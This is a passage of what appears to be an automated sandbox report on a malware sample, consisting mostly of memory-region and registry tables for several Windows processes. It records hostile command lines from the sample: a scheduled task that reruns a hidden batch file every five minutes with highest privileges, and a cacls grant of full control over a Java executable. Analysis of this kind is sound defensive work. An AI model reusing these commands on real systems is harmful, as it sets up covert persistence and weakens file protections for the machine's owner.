| private_0x00000000007f0000 | 0x007f0000 | 0x007f1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000800000 | 0x00800000 | 0x00813fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x0089ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x008a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008b0000 | 0x008b0000 | 0x008b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008c0000 | 0x008c0000 | 0x008c1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a3ffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f3c0000 | 0x7f3c0000 | 0x7f3e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f3ea000 | 0x7f3ea000 | 0x7f3ecfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ed000 | 0x7f3ed000 | 0x7f3edfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f3ee000 | 0x7f3ee000 | 0x7f3eefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #29: cmd.exe
55
0
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\QvaXf73S.bat" /sc minute /mo 5 /RL HIGHEST /F |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:56, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Self Terminated |
| Monitor Duration | 00:00:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf74 |
| Parent PID | 0x318 (c:\windows\syswow64\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F08
0x
AE0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000002e0000 | 0x002e0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002effff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002f3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00301fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x00303fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000310000 | 0x00310000 | 0x00323fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00373fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00380fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00391fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004440000 | 0x04440000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004560000 | 0x04560000 | 0x0456ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000045b0000 | 0x045b0000 | 0x045bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004640000 | 0x04640000 | 0x0473ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04740000 | 0x047fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004800000 | 0x04800000 | 0x048fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04900000 | 0x04c36fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ecc0000 | 0x7ecc0000 | 0x7edbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007edc0000 | 0x7edc0000 | 0x7ede2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ede8000 | 0x7ede8000 | 0x7ede8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ede9000 | 0x7ede9000 | 0x7ede9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007edea000 | 0x7edea000 | 0x7edecfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eded000 | 0x7eded000 | 0x7edeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\schtasks.exe | os_pid = 0xba4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #31: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #31 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Java\se-viii.exe" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:57, Reason: Child Process |
| Unmonitor | End Time: 00:01:58, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb20 |
| Parent PID | 0xeb8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
FDC
0x
FD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000b00000 | 0x00b00000 | 0x00b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00b21fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b30000 | 0x00b30000 | 0x00b43fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b50000 | 0x00b50000 | 0x00b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b90000 | 0x00b90000 | 0x00bcffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000bd0000 | 0x00bd0000 | 0x00bd3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000be0000 | 0x00be0000 | 0x00be0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00bf1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cf0000 | 0x00cf0000 | 0x00cfffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f5d0000 | 0x7f5d0000 | 0x7f5f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f5f8000 | 0x7f5f8000 | 0x7f5f8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f5f9000 | 0x7f5f9000 | 0x7f5f9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f5fd000 | 0x7f5fd000 | 0x7f5fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #32: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #32 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "separate.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:58, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Self Terminated |
| Monitor Duration | 00:00:39 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc78 |
| Parent PID | 0x1b4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
354
0x
CA8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x0470ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004710000 | 0x04710000 | 0x0472ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004710000 | 0x04710000 | 0x0471ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004720000 | 0x04720000 | 0x04723fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004730000 | 0x04730000 | 0x04731fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004730000 | 0x04730000 | 0x04733fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004740000 | 0x04740000 | 0x04753fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004760000 | 0x04760000 | 0x0479ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047a0000 | 0x047a0000 | 0x0489ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000048a0000 | 0x048a0000 | 0x048a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000048b0000 | 0x048b0000 | 0x048b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000048c0000 | 0x048c0000 | 0x048c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000048d0000 | 0x048d0000 | 0x0490ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004960000 | 0x04960000 | 0x0496ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04970000 | 0x04a2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004ac0000 | 0x04ac0000 | 0x04bbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004df0000 | 0x04df0000 | 0x04dfffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04e00000 | 0x05136fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x746b0000 | 0x74740fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.sdb | 0x7e2e0000 | 0x7e66ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000007e670000 | 0x7e670000 | 0x7e76ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e770000 | 0x7e770000 | 0x7e792fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e795000 | 0x7e795000 | 0x7e795fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e799000 | 0x7e799000 | 0x7e79bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e79c000 | 0x7e79c000 | 0x7e79efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e79f000 | 0x7e79f000 | 0x7e79ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0x60c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #33: qry2vco2.exe
179
0
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula "separate.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:01:58, Reason: Child Process |
| Unmonitor | End Time: 00:02:35, Reason: Self Terminated |
| Monitor Duration | 00:00:37 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x60c |
| Parent PID | 0xc78 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C3C
0x
F18
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0070ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000710000 | 0x00710000 | 0x00897fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008a0000 | 0x008a0000 | 0x00a20fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a30000 | 0x00a30000 | 0x01e2ffff | Pagefile Backed Memory | r |
|
|
|
- |
